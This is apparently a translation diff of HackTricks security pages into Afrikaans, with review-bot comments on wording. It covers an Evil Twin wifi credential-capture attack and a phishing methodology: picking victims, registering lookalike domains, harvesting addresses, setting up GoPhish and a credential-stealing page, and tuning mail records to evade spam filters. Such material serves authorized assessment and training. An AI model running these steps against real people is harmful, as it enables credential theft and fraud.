4. **De-authentifikasie-aanval:** Opsioneel, voer 'n de-authentifikasie-aanval uit om die klient van die regmatige netwerk af te koppel en hulle aan die valse AP te koppel.
5. **Vasvang van Legitimasiebewyse:** Sodra die klient aan die valse AP koppel en met die vangnetportaal interaksie het, word hul legitimasiebewyse vasgevang.
#### Observations from the Attack
- On Windows machines, the system might automatically connect to the fake AP, presenting the captive portal when web navigation is attempted.
- On an iPhone, the user might be prompted to accept a new certificate and then presented with the captive portal.
#### Waarnemings van die Aanval
- Op Windows-masjiene kan die stelsel outomaties aan die valse AP koppel en die vangnetportaal vertoon wanneer webnavigasie probeer word.
- Op 'n iPhone kan die gebruiker versoek word om 'n nuwe sertifikaat te aanvaar en dan die vangnetportaal vertoon te word.
#### Conclusion
While EAP-TLS is considered secure, its effectiveness heavily depends on the correct configuration and cautious behavior of end-users. Misconfigured devices or unsuspecting users accepting rogue certificates can undermine the security of an EAP-TLS protected network.
#### Gevolgtrekking
Alhoewel EAP-TLS as veilig beskou word, hang sy doeltreffendheid sterk af van die korrekte konfigurasie en versigtige gedrag van eindgebruikers. Verkeerd gekonfigureerde toestelle of argeloos gebruikers wat vals sertifikate aanvaar, kan die sekuriteit van 'n EAP-TLS-beskermde netwerk ondermyn.
For further details check https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
Vir verdere besonderhede, sien https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
## References
## Verwysings
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
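Review bot: two translated sentences in this hunk shift the technical meaning. "en voordat jy weer hostapd-wpe installeer, voer die volgende bevel uit: `apt-get install libssl1.0-dev`" renders "before compiling again hostapd-wpe" as reinstalling; libssl1.0-dev is a build dependency, so "voordat jy hostapd-wpe weer kompileer" is the accurate reading. Likewise "die outentifikasie van die klient-sertifikaat beheer word deur 'n parameter (`verify_peer`)" turns "client certificate validation" into authentication; keep "validasie" so it matches the "van 1 (valideer) na 0 (moenie valideer nie)" sentence that follows. Also consider leaving the technique name "Evil Twin" untranslated in the title rather than "Bose Tweeling", since the term appears as-is in the tooling and the referenced versprite.com article.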
@ -1,57 +1,57 @@
# Phishing Methodology
# Phishing Metodologie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Methodology
## Metodologie
1. Recon the victim
1. Select the **victim domain**.
2. Perform some basic web enumeration **searching for login portals** used by the victim and **decide** which one you will **impersonate**.
3. Use some **OSINT** to **find emails**.
2. Prepare the environment
1. **Buy the domain** you are going to use for the phishing assessment
2. **Configure the email service** related records (SPF, DMARC, DKIM, rDNS)
3. Configure the VPS with **gophish**
3. Prepare the campaign
1. Prepare the **email template**
2. Prepare the **web page** to steal the credentials
4. Launch the campaign!
1. Verken die slagoffer
1. Kies die **slagoffer-domein**.
2. Voer 'n paar basiese webondersoeke uit deur te soek na aanmeldingsportale wat deur die slagoffer gebruik word en **besluit** watter een jy sal **impersoneer**.
3. Gebruik 'n bietjie **OSINT** om e-posse te **vind**.
2. Berei die omgewing voor
1. **Koop die domein** wat jy gaan gebruik vir die hengel-assessering
2. **Konfigureer die e-posdiens** verwante rekords (SPF, DMARC, DKIM, rDNS)
3. Konfigureer die VPS met **gophish**
3. Berei die veldtog voor
1. Berei die **e-pos-sjabloon** voor
2. Berei die **webbladsy** voor om die geloofsbriewe te steel
4. Begin die veldtog!
## Generate similar domain names or buy a trusted domain
## Genereer soortgelyke domeinname of koop 'n betroubare domein
### Domain Name Variation Techniques
### Tegnieke vir die variasie van domeinname
* **Keyword**: The domain name **contains** an important **keyword** of the original domain (e.g., zelster.com-management.com).
* **hypened subdomain**: Change the **dot for a hyphen** of a subdomain (e.g., www-zelster.com).
* **New TLD**: Same domain using a **new TLD** (e.g., zelster.org)
* **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com).
* **Transposition:** It **swaps two letters** within the domain name (e.g., zelster.com).
* **Singularization/Pluralization**: Adds or removes “s” at the end of the domain name (e.g., zeltsers.com).
* **Omission**: It **removes one** of the letters from the domain name (e.g., zelser.com).
* **Repetition:** It **repeats one** of the letters in the domain name (e.g., zeltsser.com).
* **Replacement**: Like homoglyph but less stealthy. It replaces one of the letters in the domain name, perhaps with a letter in proximity of the original letter on the keyboard (e.g, zektser.com).
* **Subdomained**: Introduce a **dot** inside the domain name (e.g., ze.lster.com).
* **Insertion**: It **inserts a letter** into the domain name (e.g., zerltser.com).
* **Missing dot**: Append the TLD to the domain name. (e.g., zelstercom.com)
* **Sleutelwoord**: Die domeinnaam **bevat** 'n belangrike **sleutelwoord** van die oorspronklike domein (bv. zelster.com-management.com).
* **Gehypeniseerde subdomein**: Verander die **punt vir 'n strepie** van 'n subdomein (bv. www-zelster.com).
* **Nuwe TLD**: Dieselfde domein met 'n **nuwe TLD** (bv. zelster.org)
* **Homoglyf**: Dit **vervang** 'n letter in die domeinnaam met **letters wat soortgelyk lyk** (bv. zelfser.com).
* **Omruiling**: Dit **ruil twee letters** binne die domeinnaam om (bv. zelster.com).
* **Enkelvoud/Meervoud**: Voeg of verwyder "s" aan die einde van die domeinnaam (bv. zeltsers.com).
* **Weglating**: Dit **verwyder een** van die letters uit die domeinnaam (bv. zelser.com).
* **Herhaling**: Dit **herhaal een** van die letters in die domeinnaam (bv. zeltsser.com).
* **Vervanging**: Soos homoglyf, maar minder sluipend. Dit vervang een van die letters in die domeinnaam, miskien met 'n letter in die nabyheid van die oorspronklike letter op die sleutelbord (bv. zektser.com).
* **Subdomein**: Voeg 'n **punt** in die domeinnaam in (bv. ze.lster.com).
* **Invoeging**: Dit **voeg 'n letter** by die domeinnaam in (bv. zerltser.com).
* **Ontbrekende punt**: Voeg die TLD by die domeinnaam. (bv. zelstercom.com)
**Automatic Tools**
**Outomatiese hulpmiddels**
* [**dnstwist**](https://github.com/elceef/dnstwist)
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
**Websites**
**Webwerwe**
* [https://dnstwist.it/](https://dnstwist.it)
* [https://dnstwister.report/](https://dnstwister.report)
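Review bot: terminology is inconsistent within this hunk and against the Evil Twin page in the same commit: "phishing" is kept in the title but becomes "hengel-assessering" in "Koop die domein wat jy gaan gebruik vir die hengel-assessering", and "credentials" is "geloofsbriewe" here but "legitimasiebewyse" on the EAP-TLS page; settle on one rendering per term. The bold on "searching for login portals" is lost in "Voer 'n paar basiese webondersoeke uit deur te soek na aanmeldingsportale", and "Gehypeniseerde subdomein" is an awkward calque of the (already misspelled) "hypened subdomain"; "Subdomein met koppelteken" reads naturally. The example domains carried over unchanged also mix two base names: Transposition, Pluralization and Repetition are built on zeltser.com (zelster.com, zeltsers.com, zeltsser.com) while Keyword, New TLD and Homoglyph treat zelster.com as the original; worth fixing in the English source and this translation together.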
@ -59,54 +59,51 @@ Other ways to support HackTricks:
### Bitflipping
There is a **possibility that one of some bits stored or in communication might get automatically flipped** due to various factors like solar flares, cosmic rays, or hardware errors.
Daar is 'n **moontlikheid dat een van die bits wat gestoor of in kommunikasie is, outomaties omgeskakel kan word** as gevolg van verskeie faktore soos sonvlamme, kosmiese strale of hardewarefoute.
When this concept is **applied to DNS requests**, it is possible that the **domain received by the DNS server** is not the same as the domain initially requested.
Wanneer hierdie konsep **toegepas word op DNS-versoeke**, is dit moontlik dat die **domein wat deur die DNS-bediener ontvang word**, nie dieselfde is as die aanvanklike gevraagde domein nie.
For example, a single bit modification in the domain "windows.com" can change it to "windnws.com."
Byvoorbeeld, 'n enkele bit-wysiging in die domein "windows.com" kan dit verander na "windnws.com."
Attackers may **take advantage of this by registering multiple bit-flipping domains** that are similar to the victim's domain. Their intention is to redirect legitimate users to their own infrastructure.
Aanvallers kan hiervan **profiteer deur verskeie bit-flipping-domeine** te registreer wat soortgelyk is aan die slagoffer se domein. Hulle bedoeling is om legitieme gebruikers na hul eie infrastruktuur om te lei.
For more information read [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
Vir meer inligting, lees [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
### Buy a trusted domain
### Koop 'n betroubare domein
You can search in [https://www.expireddomains.net/](https://www.expireddomains.net) for a expired domain that you could use.\
In order to make sure that the expired domain that you are going to buy **has already a good SEO** you could search how is it categorized in:
Jy kan soek na 'n vervalde domein wat jy kan gebruik by [https://www.expireddomains.net/](https://www.expireddomains.net).\
Om seker te maak dat die vervalde domein wat jy gaan koop **reeds 'n goeie SEO het**, kan jy nagaan hoe dit gekategoriseer word in:
* [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
* [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
## Discovering Emails
## Ontdek e-posse
* [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% free)
* [https://phonebook.cz/](https://phonebook.cz) (100% free)
* [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% gratis)
* [https://phonebook.cz/](https://phonebook.cz) (100% gratis)
* [https://maildb.io/](https://maildb.io)
* [https://hunter.io/](https://hunter.io)
* [https://anymailfinder.com/](https://anymailfinder.com)
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
Om meer geldige e-posse te **ontdek** of die een wat jy reeds ontdek het, te **verifieer**, kan jy kyk of jy hul smtp-bedieners kan brute force. [Leer hoe om e-posadres te verifieer/ontdek hier](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
Moenie ook vergeet dat as gebruikers **enige webportaal gebruik om by hul e-posse te kom**, jy kan nagaan of dit vatbaar is vir **gebruikersnaam-brute force**, en die kwesbaarheid uitbuit indien moontlik.
## Configuring GoPhish
## Konfigurering van GoPhish
### Installation
### Installasie
You can download it from [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
Download and decompress it inside `/opt/gophish` and execute `/opt/gophish/gophish`\
You will be given a password for the admin user in port 3333 in the output. Therefore, access that port and use those credentials to change the admin password. You may need to tunnel that port to local:
Jy kan dit aflaai vanaf [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
Laai dit af en dekomprimeer dit binne `/opt/gophish` en voer `/opt/gophish/gophish` uit\
Jy sal 'n wagwoord vir die admin-gebruiker kry op poort 3333 in die uitset. Toegang daardie poort en gebruik daardie geloofsbriewe om die admin-wagwoord te verander. Jy mag dalk daardie poort na plaaslike toe moet skuif:
```bash
ssh -L 3333:127.0.0.1:3333 <user>@<ip>
```
### Konfigurasie
### Configuration
**TLS certificate configuration**
Before this step you should have **already bought the domain** you are going to use and it must be **pointing** to the **IP of the VPS** where you are configuring **gophish**.
**TLS-sertifikaatkonfigurasie**
Voordat hierdie stap geneem word, moet jy die domein wat jy gaan gebruik, **reeds gekoop** het en dit moet na die **IP van die VPS** waar jy **gophish** konfigureer, **verwys**.
```bash
DOMAIN="<domain>"
wget https://dl.eff.org/certbot-auto
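Review bot: "Toegang daardie poort en gebruik daardie geloofsbriewe om die admin-wagwoord te verander" uses the noun "toegang" as a verb; "Kry toegang tot daardie poort" is the grammatical form, and in the same hunk "die een wat jy reeds ontdek het" should be plural ("dié wat jy reeds ontdek het") to match "verify the ones you have already discovered". The translated file also drops the blank line between the closing ``` of the `ssh -L 3333:127.0.0.1:3333` block and the "### Konfigurasie" heading, so the heading sits directly on the fence; keep the blank line the English side has, since some Markdown renderers fold a heading into the preceding block without it.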
@ -122,67 +119,61 @@ mkdir /opt/gophish/ssl_keys
cp "/etc/letsencrypt/live/$DOMAIN/privkey.pem" /opt/gophish/ssl_keys/key.pem
cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt
```
**Poskonfigurasie**
**Mail configuration**
Begin deur te installeer: `apt-get install postfix`
Start installing: `apt-get install postfix`
Then add the domain to the following files:
Voeg dan die domein by die volgende lêers:
* **/etc/postfix/virtual\_domains**
* **/etc/postfix/transport**
* **/etc/postfix/virtual\_regexp**
**Change also the values of the following variables inside /etc/postfix/main.cf**
**Verander ook die waardes van die volgende veranderlikes binne /etc/postfix/main.cf**
`myhostname = <domain>`\
`mydestination = $myhostname, <domain>, localhost.com, localhost`
Finally modify the files **`/etc/hostname`** and **`/etc/mailname`** to your domain name and **restart your VPS.**
Verander uiteindelik die lêers **`/etc/hostname`** en **`/etc/mailname`** na jou domeinnaam en **herlaai jou VPS.**
Now, create a **DNS A record** of `mail.<domain>` pointing to the **ip address** of the VPS and a **DNS MX** record pointing to `mail.<domain>`
Now lets test to send an email:
Skep nou 'n **DNS A-rekord** van `mail.<domain>` wat na die **ip-adres** van die VPS wys en 'n **DNS MX-rekord** wat na `mail.<domain>` wys.
Laat ons nou toets om 'n e-pos te stuur:
```bash
apt install mailutils
echo "This is the body of the email" | mail -s "This is the subject line" test@email.com
```
**Gophish konfigurasie**
**Gophish configuration**
Stop the execution of gophish and lets configure it.\
Modify `/opt/gophish/config.json` to the following (note the use of https):
Stop die uitvoering van gophish en laat ons dit konfigureer.\
Wysig `/opt/gophish/config.json` na die volgende (let op die gebruik van https):
```bash
{
"admin_server": {
"listen_url": "127.0.0.1:3333",
"use_tls": true,
"cert_path": "gophish_admin.crt",
"key_path": "gophish_admin.key"
},
"phish_server": {
"listen_url": "0.0.0.0:443",
"use_tls": true,
"cert_path": "/opt/gophish/ssl_keys/key.crt",
"key_path": "/opt/gophish/ssl_keys/key.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
"admin_server": {
"listen_url": "127.0.0.1:3333",
"use_tls": true,
"cert_path": "gophish_admin.crt",
"key_path": "gophish_admin.key"
},
"phish_server": {
"listen_url": "0.0.0.0:443",
"use_tls": true,
"cert_path": "/opt/gophish/ssl_keys/key.crt",
"key_path": "/opt/gophish/ssl_keys/key.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}
```
**Stel gophish-diens op**
**Configure gophish service**
In order to create the gophish service so it can be started automatically and managed a service you can create the file `/etc/init.d/gophish` with the following content:
Om die gophish-diens te skep sodat dit outomaties gestart en bestuur kan word as 'n diens, kan jy die lêer `/etc/init.d/gophish` skep met die volgende inhoud:
```bash
#!/bin/bash
# /etc/init.d/gophish
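Review bot: the translated side again drops the blank line after each closing code fence: "**Poskonfigurasie**", "**Gophish konfigurasie**" and "**Stel gophish-diens op**" each sit directly on the ``` that precedes them, where the English side had a blank line; restore it. The whole config.json block from `"admin_server": {` to the closing `}` is re-emitted with identical content on both sides, so the only change is whitespace; a translation commit should not touch a code block that contains nothing to translate, and if it is touched anyway, the nested `admin_server` / `phish_server` objects should keep their indentation and the fence should be tagged json rather than bash. Leaving the mail test literals ("This is the body of the email", "This is the subject line") untranslated is correct, since they are command arguments.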
@ -203,35 +194,33 @@ logfile=/var/log/gophish/gophish.log
errfile=/var/log/gophish/gophish.error
start() {
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
}
stop() {
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
}
status() {
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
}
case $1 in
start|stop|status) "$1" ;;
start|stop|status) "$1" ;;
esac
```
Finish configuring the service and checking it doing:
Voltooi die konfigurasie van die diens en toets dit deur die volgende stappe te volg:
```bash
mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
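Review bot: the status() test in this init script is broken on both sides of the hunk: `if [["$pid" != ""| "$pid" != "" ]]; then` has no space after `[[` (bash parses `[["$pid"` as a command name), uses a single `|` where `||` is intended, and compares the same operand twice; it should read `if [[ -n "$pid" ]]; then`. Because the start(), stop() and status() bodies are re-emitted here with identical content (a whitespace-only change), this is the moment to fix the test rather than carry the bug into the translated file, and to keep the function bodies indented as the English side has them.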
@ -242,69 +231,60 @@ service gophish status
ss -l | grep "3333\|443"
service gophish stop
```
## Konfigureer posdiens en domein
## Configuring mail server and domain
### Wag en wees legitiem
### Wait & be legit
Hoe ouer 'n domein is, hoe minder waarskynlik is dit dat dit as spam gevang sal word. Jy moet dus so lank as moontlik wag (ten minste 1 week) voordat jy die phising-assessering doen. Verder sal die reputasie wat verkry word beter wees as jy 'n bladsy oor 'n reputasievolle sektor plaas.
|
||||
|
||||
The older a domain is the less probable it's going to be caught as spam. Then you should wait as much time as possible (at least 1week) before the phishing assessment. moreover, if you put a page about a reputational sector the reputation obtained will be better.
|
||||
Let daarop dat selfs al moet jy 'n week wag, jy alles nou kan konfigureer.
|
||||
|
||||
Note that even if you have to wait a week you can finish configuring everything now.
|
||||
### Konfigureer omgekeerde DNS (rDNS) rekord
|
||||
|
||||
### Configure Reverse DNS (rDNS) record
|
||||
Stel 'n rDNS (PTR) rekord in wat die IP-adres van die VPS na die domeinnaam oplos.
|
||||
|
||||
Set a rDNS (PTR) record that resolves the IP address of the VPS to the domain name.
|
||||
### Sender Policy Framework (SPF) Rekord
|
||||
|
||||
### Sender Policy Framework (SPF) Record
|
||||
Jy moet **'n SPF-rekord vir die nuwe domein konfigureer**. As jy nie weet wat 'n SPF-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/#spf).
|
||||
|
||||
You must **configure a SPF record for the new domain**. If you don't know what is a SPF record [**read this page**](../../network-services-pentesting/pentesting-smtp/#spf).
|
||||
|
||||
You can use [https://www.spfwizard.net/](https://www.spfwizard.net) to generate your SPF policy (use the IP of the VPS machine)
|
||||
Jy kan [https://www.spfwizard.net/](https://www.spfwizard.net) gebruik om jou SPF-beleid te genereer (gebruik die IP van die VPS-masjien)
|
||||
|
||||
![](<../../.gitbook/assets/image (388).png>)
|
||||
|
||||
This is the content that must be set inside a TXT record inside the domain:
|
||||
|
||||
Dit is die inhoud wat binne 'n TXT-rekord in die domein ingestel moet word:
|
||||
```bash
|
||||
v=spf1 mx a ip4:ip.ip.ip.ip ?all
|
||||
```
|
||||
### Domeingebaseerde Berigverifikasie, Rapportering en Nakoming (DMARC) Rekord
|
||||
|
||||
### Domain-based Message Authentication, Reporting & Conformance (DMARC) Record
|
||||
|
||||
You must **configure a DMARC record for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dmarc).
|
||||
|
||||
You have to create a new DNS TXT record pointing the hostname `_dmarc.<domain>` with the following content:
|
||||
Jy moet 'n DMARC-rekord **konfigureer vir die nuwe domein**. As jy nie weet wat 'n DMARC-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/#dmarc).
|
||||
|
||||
Jy moet 'n nuwe DNS TXT-rekord skep wat die gasheernaam `_dmarc.<domein>` na die volgende inhoud verwys:
|
||||
```bash
|
||||
v=DMARC1; p=none
|
||||
```
|
||||
|
||||
### DomainKeys Identified Mail (DKIM)
|
||||
|
||||
You must **configure a DKIM for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dkim).
|
||||
Jy moet 'n DKIM vir die nuwe domein **konfigureer**. As jy nie weet wat 'n DMARC-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/#dkim).
|
||||
|
||||
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
|
||||
Hierdie handleiding is gebaseer op: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
|
||||
|
||||
{% hint style="info" %}
|
||||
You need to concatenate both B64 values that the DKIM key generates:
|
||||
|
||||
Jy moet beide B64-waardes wat die DKIM-sleutel genereer, saamvoeg:
|
||||
```
|
||||
v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
### Test your email configuration score
|
||||
|
||||
You can do that using [https://www.mail-tester.com/](https://www.mail-tester.com)\
|
||||
Just access the page and send an email to the address they give you:
|
||||
### Toets jou e-pos konfigurasie telling
|
||||
|
||||
Jy kan dit doen deur gebruik te maak van [https://www.mail-tester.com/](https://www.mail-tester.com)\
|
||||
Net toegang tot die bladsy en stuur 'n e-pos na die adres wat hulle aan jou gee:
|
||||
```bash
|
||||
echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
|
||||
```
|
||||
|
||||
You can also **check your email configuration** sending an email to `check-auth@verifier.port25.com` and **reading the response** (for this you will need to **open** port **25** and see the response in the file _/var/mail/root_ if you send the email a as root).\
|
||||
Check that you pass all the tests:
|
||||
|
||||
Jy kan ook **jou e-pos konfigurasie nagaan** deur 'n e-pos te stuur na `check-auth@verifier.port25.com` en **die antwoord te lees** (hiervoor sal jy die poort **25** moet **oopmaak** en die antwoord in die lêer _/var/mail/root_ sien as jy die e-pos as root stuur).\
|
||||
Maak seker dat jy slaag vir al die toetse:
|
||||
```bash
|
||||
==========================================================
|
||||
Summary of Results
|
||||
|
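Review bot: the DKIM paragraph `Jy moet 'n DKIM vir die nuwe domein konfigureer. As jy nie weet wat 'n DMARC-rekord is nie` carries over the copy-paste mistake from the English source (`If you don't know what is a DMARC record` under the `### DomainKeys Identified Mail (DKIM)` heading); it should say DKIM-rekord, since the link already points at `#dkim`. In the hint that tells the reader to concatenate the two base64 halves, the example value still contains the un-joined split (`...E1nTh3xj" "Y9N/Dt3+...`), so the TXT record as shown would be published with a literal `" "` in the middle of the key; show the joined string. The spelling `phising` in `voordat jy die phising-assessering doen` is a typo inherited from the English, not a translation; use `phishing`.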
@ -315,49 +295,45 @@ DKIM check: pass
|
|||
Sender-ID check: pass
|
||||
SpamAssassin check: ham
|
||||
```
|
||||
|
||||
You could also send **message to a Gmail under your control**, and check the **email’s headers** in your Gmail inbox, `dkim=pass` should be present in the `Authentication-Results` header field.
|
||||
|
||||
Jy kan ook 'n **boodskap na 'n Gmail onder jou beheer** stuur en die **e-pos se koppe** in jou Gmail-inboks nagaan, `dkim=pass` moet teenwoordig wees in die `Authentication-Results` kopvel.
|
||||
```
|
||||
Authentication-Results: mx.google.com;
|
||||
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
|
||||
dkim=pass header.i=@example.com;
|
||||
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
|
||||
dkim=pass header.i=@example.com;
|
||||
```
|
||||
### Verwydering van Spamhouse Blacklist
|
||||
|
||||
### Removing from Spamhouse Blacklist
|
||||
Die bladsy [www.mail-tester.com](www.mail-tester.com) kan aandui of jou domein deur Spamhouse geblokkeer word. Jy kan versoek dat jou domein/IP verwyder word by: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
|
||||
|
||||
The page [www.mail-tester.com](www.mail-tester.com) can indicate you if you your domain is being blocked by spamhouse. You can request your domain/IP to be removed at: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
|
||||
### Verwydering van Microsoft Blacklist
|
||||
|
||||
### Removing from Microsoft Blacklist
|
||||
Jy kan versoek dat jou domein/IP verwyder word by [https://sender.office.com/](https://sender.office.com).
|
||||
|
||||
